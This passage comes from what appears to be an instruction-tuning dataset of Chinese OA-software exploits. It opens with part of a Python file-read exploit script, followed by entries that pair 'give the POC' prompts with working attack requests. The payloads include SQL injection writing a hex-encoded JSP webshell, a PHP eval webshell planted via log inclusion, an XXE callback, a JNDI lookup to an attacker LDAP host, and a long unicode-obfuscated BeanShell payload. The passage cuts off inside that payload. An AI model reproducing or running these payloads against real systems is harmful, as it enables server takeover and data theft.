\\033[0m\".format(e))\n        sys.exit(0)\n\n# 验证漏洞\ndef POC_2(target_url, id):\n    file_url = target_url + \"/file/fileNoLogin/{}\".format(id)\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\",\n        \"Content-Type\": \"application/x-www-form-urlencoded\"\n    }\n    try:\n        response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)\n        response.encoding = 'GBK'\n        print(\"\\033[32m[o] 成功读取:\\n\\033[0m{}\".format(response.text))\n    except Exception as e:\n        print(\"\\033[31m[x] 请求失败:{} \\033[0m\".format(e))\n        sys.exit(0)\n\n# windows 文件读取\ndef POC_3(target_url, File):\n    file_url = target_url + \"/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/{}&fileExt=txt\".format(File)\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\",\n        \"Content-Type\": \"application/x-www-form-urlencoded\"\n    }\n    try:\n        response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)\n        id = re.findall(r'\"id\":\"(.*?)\"', response.text)[0]\n        print(\"\\033[32m[o] 成功获取id:{}\\033[0m\".format(id))\n        POC_2(target_url, id)\n    except :\n        print(\"\\033[31m[x] 请求失败,无法读取文件 \\033[0m)\")\n\n# linux读取文件\ndef POC_4(target_url, File):\n    file_url = target_url + \"/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file://{}&fileExt=txt\".format(File)\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\",\n        \"Content-Type\": \"application/x-www-form-urlencoded\"\n    }\n    try:\n        response = requests.get(url=file_url, headers=headers, verify=False, timeout=10)\n        id = re.findall(r'\"id\":\"(.*?)\"', response.text)[0]\n        print(\"\\033[32m[o] 成功获取id:{}\\033[0m\".format(id))\n        POC_2(target_url, id)\n    except:\n        print(\"\\033[31m[x] 请求失败,无法读取文件 \\033[0m)\")\n\n\nif __name__ == '__main__':\n    title()\n    target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl   >>> \\033[0m\"))\n    id,system = POC_1(target_url)\n    POC_2(target_url, id)\n    while True:\n        if system == \"windows\":\n            File = input(\"\\033[35mFile >>> \\033[0m\")\n            if File == \"exit\":\n                sys.exit(0)\n            else:\n                POC_3(target_url, File)\n        if system == \"linux\":\n            File = input(\"\\033[35mFile >>> \\033[0m\")\n            if File == \"exit\":\n                sys.exit(0)\n            else:\n                POC_4(target_url, File)\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Bridge saveYZJFile 任意文件读取漏洞.md"}
    984. 

  984. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞\n漏洞描述:通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击\n影响版本:``` 通达OA v2014 ```\n网络测绘:``` app=\"TDXK-通达OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"TDXK-通达OA\"\n2. /mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3\n3. 通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞.md"}
    985. 

  985. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v11.5 login_code.php 任意用户登录\n漏洞描述:通达OA是一套办公系统。2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录。\n影响版本:``` 通达OA 2017版 通达OA版本  V11.X < V11.5 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 通达OA 2017版\n通达OA版本  V11.X < V11.5\n2. https://cdndown.tongda2000.com/oa/2019/TDOA11.4.exe\n3. root@kali:~/桌面# python3 1.py -v 11 -u http://xx.xxx.xxx.xxx\n[+]Get Available COOKIE:PHPSESSID=sr3f46qg6539khd3e3rrucoa72; path=/\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v11.5 login_code.php 任意用户登录.md"}
    986. 

  986. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:致远OA A6 setextno.jsp SQL注入漏洞\n漏洞描述:致远OA A6 setextno.jsp 存在sql注入漏洞,并可以通过注入写入webshell文件控制服务器\n影响版本:``` 致远OA A6 ```\n网络测绘:``` title=\"致远A8+协同管理软件.A6\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. title=\"致远A8+协同管理软件.A6\"\n2. /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(md5(1)),4#\n3. http://xxx.xxx.xxx/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999) union all select 1,2,(select unhex('3C25696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293B253E')  into outfile 'D:/Program Files/UFseeyon/OA/tomcat/webapps/yyoa/test_upload.jsp'),4#\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/致远OA A6 setextno.jsp SQL注入漏洞.md"}
    987. 

  987. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 GRP-U8 UploadFileData 任意文件上传漏洞\n漏洞描述:用友 GRP-U8 UploadFileData接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限\n影响版本:``` 用友 GRP-U8 ```\n网络测绘:``` app=\"用友-GRP-U8\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"用友-GRP-U8\"\n2. POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename=debugg.jsp&filename=1.jpg HTTP/1.1\nHost: \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: JSESSIONID=59227D2C93FE3E8C2626DA625CE710F9\nContent-Type: multipart/form-data\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36\n\n------WebKitFormBoundary92pUawKc\nContent-Disposition: form-data; name=\"myFile\";filename=\"test.jpg\"\n\n<% out.println(\"123\");%>\n------WebKitFormBoundary92pUawKc--\n3. /R9iPortal/debugg.jsp\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 GRP-U8 UploadFileData 任意文件上传漏洞.md"}
    988. 

  988. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:万户OA TeleConferenceService XXE注入漏洞\n漏洞描述:万户OA TeleConferenceService接口存在XXE注入漏洞,攻击者通过漏洞可以继续XXE注入获取服务器敏感信息\n影响版本:``` 万户OA ```\n网络测绘:``` app=\"万户网络-ezOFFICE\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"万户网络-ezOFFICE\"\n2. POST /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleConferenceService\n\n<?xml version=\"1.0\" encoding=\"UTF-8\" ?>\n<!DOCTYPE ANY [\n<!ENTITY xxe SYSTEM \"http://fep6kf.dnslog.cn\" >]>        \n<value>&xxe;</value>\n3. <?xml version=\"1.0\" encoding=\"UTF-8\" ?>\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/万户OA TeleConferenceService XXE注入漏洞.md"}
    989. 

  989. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 NC bsh.servlet.BshServlet 远程命令执行漏洞\n漏洞描述:用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限\n影响版本:``` 用友 NC ```\n网络测绘:``` icon_hash=\"1085941792\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. icon_hash=\"1085941792\"\n2. /servlet/~ic/bsh.servlet.BshServlet\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 NC bsh.servlet.BshServlet 远程命令执行漏洞.md"}
    990. 

  990. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:泛微OA E-Cology getSqlData SQL注入漏洞\n漏洞描述:泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。 泛微e-cology存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息。\n影响版本:``` 泛微e-cology 8.0 ```\n网络测绘:``` app=\"泛微-协同办公OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. 泛微e-cology 8.0\n2. app=\"泛微-协同办公OA\"\n3. /Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/泛微OA E-Cology getSqlData SQL注入漏洞.md"}
    991. 

  991. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:极限OA video_file.php 任意文件读取漏洞\n漏洞描述:极限OA video_file.php存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器敏感文件\n影响版本:``` 极限OA ```\n网络测绘:``` icon_hash=\"1967132225\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. icon_hash=\"1967132225\"\n2. /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/极限OA video_file.php 任意文件读取漏洞.md"}
    992. 

  992. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:用友 NC Cloud 远程代码执行漏洞 CNVD-C-2023-76801\n漏洞描述:用友 NC 及 NC Cloud 系统存在任意文件上传漏洞,攻击者可通过 uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给 NC 服务器预埋后门,从而可以随意操作服务器。\n影响版本:``` NC63、NC633、NC65 NC Cloud1903、NC Cloud1909 NC Cloud2005、NC Cloud2105、NC Cloud2111 YonBIP 高级版 2207 ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. NC63、NC633、NC65\nNC Cloud1903、NC Cloud1909\nNC Cloud2005、NC Cloud2105、NC Cloud2111\nYonBIP 高级版 2207\n2. POST /uapjs/jsinvoke/?action=invoke HTTP/1.1\nHost: your-ip\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0\n \n{\"serviceName\":\"nc.itf.iufo.IBaseSPService\",\"methodName\":\"saveXStreamConfig\",\"parameterTypes\":[\"java.lang.Object\",\"java.lang.String\"],\"parameters\":[\"${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}\",\"webapps/nc_web/jndi.jsp\"]}\n3. GET /jndi.jsp HTTP/1.1\nHost: your-ip\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0\ncmd: whoami\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/用友 NC Cloud 远程代码执行漏洞 CNVD-C-2023-76801.md"}
    993. 

  993. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:通达OA v11.8 getway.php 远程文件包含漏洞\n漏洞描述:通达OA v11.8 getway.php 存在文件包含漏洞,攻击者通过发送恶意请求包含日志文件导致任意文件写入漏洞\n影响版本:``` 通达OA v11.8 ```\n网络测绘:``` app=\"TDXK-通达OA\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"TDXK-通达OA\"\n2. GET /d1a4278d?json={}&aa=<?php @fputs(fopen(base64_decode('Y21kc2hlbGwucGhw'),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydjbWRzaGVsbCddKTs/Pg=='));?> HTTP/1.1\nHost: \nUser-Agent: Go-http-client/1.1\nAccept-Encoding: gzip\n3. POST /ispirit/interface/gateway.php HTTP/1.1\nHost: \nUser-Agent: Go-http-client/1.1\nContent-Length: 54\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\njson={\"url\":\"/general/../../nginx/logs/oa.access.log\"}\n", "category": "poc_oa_vulnerability", "source": "awesome_poc_dataset", "file_path": "OA产品漏洞/通达OA v11.8 getway.php 远程文件包含漏洞.md"}
    994. 

  994. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:蓝凌OA sysSearchMain.do 远程命令执行漏洞\n漏洞描述:蓝凌OA sysSearchMain.do文件 存在任意文件写入漏洞,攻击者获取后台权限后可通过漏洞写入任意文件,也可以通过 custom.jsp 文件未授权写入恶意文件\n影响版本:``` 蓝凌OA ```\n网络测绘:``` app=\"Landray-OA系统\" ```\n", "input": "", "output": "【漏洞类型】oa_vulnerability\n【POC利用方法】\n1. app=\"Landray-OA系统\"\n2. 参数为 FdParameters,在 com.landray.kmss.sys.search.jar 中的 com.landray.kmss.sys.search.actions.SysSearchMainAction 类。\n\nmethod 为 editrParam。 对 fdParemNames 的内容进行了判空。如果不为空,进入 SysSearchDictUtil.getParamConditionEntry 方法。 也是对 fdParemNames 进行了一次判空。然后传入 ObjectXML.objectXMLDecoderByString 方法。 \n/sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&FdParameters=[shellcode]\n3. POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1\nHost: \nUser-Agent: Go-http-client/1.1\nContent-Length: 17574\nCmd: dir\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\nvar={\"body\":{\"file\":\"/sys/search/sys_search_main/sysSearchMain.do?method=editParam\"}}&fdParemNames=11&fdParameters=<java><void class=\"bsh.Interpreter\"><void%20method=%22eval%22><string>\\u0020\\u0020\\u0020\\u0020\\u0062\\u006f\\u006f\\u006c\\u0065\\u0061\\u006e\\u0020\\u0066\\u006c\\u0061\\u0067\\u0020\\u003d\\u0020\\u0066\\u0061\\u006c\\u0073\\u0065\\u003b\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u0047\\u0072\\u006f\\u0075\\u0070\\u0020\\u0067\\u0072\\u006f\\u0075\\u0070\\u0020\\u003d\\u0020\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u002e\\u0063\\u0075\\u0072\\u0072\\u0065\\u006e\\u0074\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u0047\\u0072\\u006f\\u0075\\u0070\\u0028\\u0029\\u003b\\u006a\\u0061\\u0076\\u0061\\u002e\\u006c\\u0061\\u006e\\u0067\\u002e\\u0072\\u0065\\u0066\\u006c\\u0065\\u0063\\u0074\\u002e\\u0046\\u0069\\u0065\\u006c\\u0064\\u0020\\u0066\\u0020\\u003d\\u0020\\u0067\\u0072\\u006f\\u0075\\u0070\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0074\\u0068\\u0072\\u0065\\u0061\\u0064\\u0073\\u0022\\u0029\\u003b\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u005b\\u005d\\u0020\\u0074\\u0068\\u0072\\u0065\\u0061\\u0064\\u0073\\u0020\\u003d\\u0020\\u0028\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u005b\\u005d\\u0029\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u0067\\u0072\\u006f\\u0075\\u0070\\u0029\\u003b\\u0066\\u006f\\u0072\\u0020\\u0028\\u0069\\u006e\\u0074\\u0020\\u0069\\u0020\\u003d\\u0020\\u0030\\u003b\\u0020\\u0069\\u0020\\u003c\\u0020\\u0074\\u0068\\u0072\\u0065\\u0061\\u0064\\u0073\\u002e\\u006c\\u0065\\u006e\\u0067\\u0074\\u0068\\u003b\\u0020\\u0069\\u002b\\u002b\\u0029\\u0020\\u007b\\u0020\\u0074\\u0072\\u0079\\u0020\\u007b\\u0020\\u0054\\u0068\\u0072\\u0065\\u0061\\u0064\\u0020\\u0074\\u0020\\u003d\\u0020\\u0074\\u0068\\u0072\\u0065\\u0061\\u0064\\u0073\\u005b\\u0069\\u005d\\u003b\\u0069\\u0066\\u0020\\u0028\\u0074\\u0020\\u003d\\u003d\\u0020\\u006e\\u0075\\u006c\\u006c\\u0029\\u0020\\u007b\\u0020\\u0063\\u006f\\u006e\\u0074\\u0069\\u006e\\u0075\\u0065\\u003b\\u0020\\u007d\\u0053\\u0074\\u0072\\u0069\\u006e\\u0067\\u0020\\u0073\\u0074\\u0072\\u0020\\u003d\\u0020\\u0074\\u002e\\u0067\\u0065\\u0074\\u004e\\u0061\\u006d\\u0065\\u0028\\u0029\\u003b\\u0069\\u0066\\u0020\\u0028\\u0073\\u0074\\u0072\\u002e\\u0063\\u006f\\u006e\\u0074\\u0061\\u0069\\u006e\\u0073\\u0028\\u0022\\u0065\\u0078\\u0065\\u0063\\u0022\\u0029\\u0020\\u007c\\u007c\\u0020\\u0021\\u0073\\u0074\\u0072\\u002e\\u0063\\u006f\\u006e\\u0074\\u0061\\u0069\\u006e\\u0073\\u0028\\u0022\\u0068\\u0074\\u0074\\u0070\\u0022\\u0029\\u0029\\u0020\\u007b\\u0020\\u0063\\u006f\\u006e\\u0074\\u0069\\u006e\\u0075\\u0065\\u003b\\u0020\\u007d\\u0066\\u0020\\u003d\\u0020\\u0074\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0074\\u0061\\u0072\\u0067\\u0065\\u0074\\u0022\\u0029\\u003b\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u0020\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u0074\\u0029\\u003b\\u0069\\u0066\\u0020\\u0028\\u0021\\u0028\\u006f\\u0062\\u006a\\u0020\\u0069\\u006e\\u0073\\u0074\\u0061\\u006e\\u0063\\u0065\\u006f\\u0066\\u0020\\u0052\\u0075\\u006e\\u006e\\u0061\\u0062\\u006c\\u0065\\u0029\\u0029\\u0020\\u007b\\u0020\\u0063\\u006f\\u006e\\u0074\\u0069\\u006e\\u0075\\u0065\\u003b\\u0020\\u007d\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0074\\u0068\\u0069\\u0073\\u0024\\u0030\\u0022\\u0029\\u003b\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u006f\\u0062\\u006a\\u0029\\u003b\\u0074\\u0072\\u0079\\u0020\\u007b\\u0020\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0068\\u0061\\u006e\\u0064\\u006c\\u0065\\u0072\\u0022\\u0029\\u003b\\u0020\\u007d\\u0020\\u0063\\u0061\\u0074\\u0063\\u0068\\u0020\\u0028\\u004e\\u006f\\u0053\\u0075\\u0063\\u0068\\u0046\\u0069\\u0065\\u006c\\u0064\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0020\\u0065\\u0029\\u0020\\u007b\\u0020\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0053\\u0075\\u0070\\u0065\\u0072\\u0063\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0053\\u0075\\u0070\\u0065\\u0072\\u0063\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0068\\u0061\\u006e\\u0064\\u006c\\u0065\\u0072\\u0022\\u0029\\u003b\\u0020\\u007d\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u006f\\u0062\\u006a\\u0029\\u003b\\u0074\\u0072\\u0079\\u0020\\u007b\\u0020\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0053\\u0075\\u0070\\u0065\\u0072\\u0063\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0067\\u006c\\u006f\\u0062\\u0061\\u006c\\u0022\\u0029\\u003b\\u0020\\u007d\\u0020\\u0063\\u0061\\u0074\\u0063\\u0068\\u0020\\u0028\\u004e\\u006f\\u0053\\u0075\\u0063\\u0068\\u0046\\u0069\\u0065\\u006c\\u0064\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0020\\u0065\\u0029\\u0020\\u007b\\u0020\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0067\\u006c\\u006f\\u0062\\u0061\\u006c\\u0022\\u0029\\u003b\\u0020\\u007d\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u006f\\u0062\\u006a\\u0020\\u003d\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u006f\\u0062\\u006a\\u0029\\u003b\\u0066\\u0020\\u003d\\u0020\\u006f\\u0062\\u006a\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0073\\u0022\\u0029\\u003b\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u006a\\u0061\\u0076\\u0061\\u002e\\u0075\\u0074\\u0069\\u006c\\u002e\\u004c\\u0069\\u0073\\u0074\\u0020\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0073\\u0020\\u003d\\u0020\\u0028\\u006a\\u0061\\u0076\\u0061\\u002e\\u0075\\u0074\\u0069\\u006c\\u002e\\u004c\\u0069\\u0073\\u0074\\u0029\\u0020\\u0028\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u006f\\u0062\\u006a\\u0029\\u0029\\u003b\\u0066\\u006f\\u0072\\u0020\\u0028\\u0069\\u006e\\u0074\\u0020\\u006a\\u0020\\u003d\\u0020\\u0030\\u003b\\u0020\\u006a\\u0020\\u003c\\u0020\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0073\\u002e\\u0073\\u0069\\u007a\\u0065\\u0028\\u0029\\u003b\\u0020\\u002b\\u002b\\u006a\\u0029\\u0020\\u007b\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u0020\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0020\\u003d\\u0020\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0073\\u002e\\u0067\\u0065\\u0074\\u0028\\u006a\\u0029\\u003b\\u0066\\u0020\\u003d\\u0020\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u0046\\u0069\\u0065\\u006c\\u0064\\u0028\\u0022\\u0072\\u0065\\u0071\\u0022\\u0029\\u003b\\u0066\\u002e\\u0073\\u0065\\u0074\\u0041\\u0063\\u0063\\u0065\\u0073\\u0073\\u0069\\u0062\\u006c\\u0065\\u0028\\u0074\\u0072\\u0075\\u0065\\u0029\\u003b\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u0020\\u0072\\u0065\\u0071\\u0020\\u003d\\u0020\\u0066\\u002e\\u0067\\u0065\\u0074\\u0028\\u0070\\u0072\\u006f\\u0063\\u0065\\u0073\\u0073\\u006f\\u0072\\u0029\\u003b\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u0020\\u0072\\u0065\\u0073\\u0070\\u0020\\u003d\\u0020\\u0072\\u0065\\u0071\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064